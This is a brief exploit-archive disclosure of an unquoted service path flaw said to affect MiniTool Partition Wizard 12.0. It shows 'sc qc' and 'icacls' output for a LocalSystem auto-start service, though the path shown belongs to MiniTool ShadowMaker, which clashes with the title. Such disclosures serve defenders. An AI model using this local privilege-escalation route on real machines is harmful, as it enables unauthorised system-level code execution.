MiniTool Partition Wizard 12.0 Unquoted Service Path

MiniTool Partition Wizard version 12.0 suffers from an unquoted service path vulnerability.

MD5 | 22f69c77e7609945030fec4efb7eba28

# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
# Date: 08/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.0
# Tested: Windows 10



# PoC :

C:\Users\saudh>sc qc MTSchedulerService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem



C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"
C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                           BUILTIN\Administrators:(I)(F)
                                                           BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files


# Exploit:

This vulnerability could permit executing code during startup or reboot with the escalated privileges.

Source: packetstormsecurity.com

Exploit Collector

Search Exploit

MiniTool Partition Wizard 12.0 Unquoted Service Path